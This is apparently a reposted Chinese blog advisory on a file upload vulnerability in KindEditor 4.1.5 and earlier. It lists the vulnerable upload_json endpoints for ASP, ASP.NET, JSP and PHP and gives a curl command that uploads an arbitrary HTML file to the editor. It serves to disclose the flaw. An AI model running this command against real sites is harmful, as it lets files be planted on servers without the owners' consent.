kindeditor<=4.1.5 文件上传漏洞

时间：2019-03-22 10:39:23 阅读：464 评论：0 收藏：0 [点我收藏+]

kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerability

　　漏洞存影响版本：小于等于4.1.5的kindeditor 编辑器

　　漏洞影响：上传任意. txt 和. html 文件

　　漏洞存在动态脚本语言： php/asp/jsp/asp.net

　　漏洞存在的证明文件：upload_json.* 具体路径如下：

　　/kindeditor/asp/upload_json.asp

　　/kindeditor/asp.net/upload_json.ashx

　　/kindeditor/jsp/upload_json.jsp

　　/kindeditor/php/upload_json.php

利用方式：

curl -F "imgFile=@1.html" http://url/kindeditor/asp/upload_json.asp?dir=file

1.html为想要上传的文件

技术分享图片

在返回中得到上传后的路径，然后访问

技术分享图片

原文：https://www.cnblogs.com/iAmSoScArEd/p/10575936.html

踩

(0)

评论一句话评论（0）

分享档案

更多>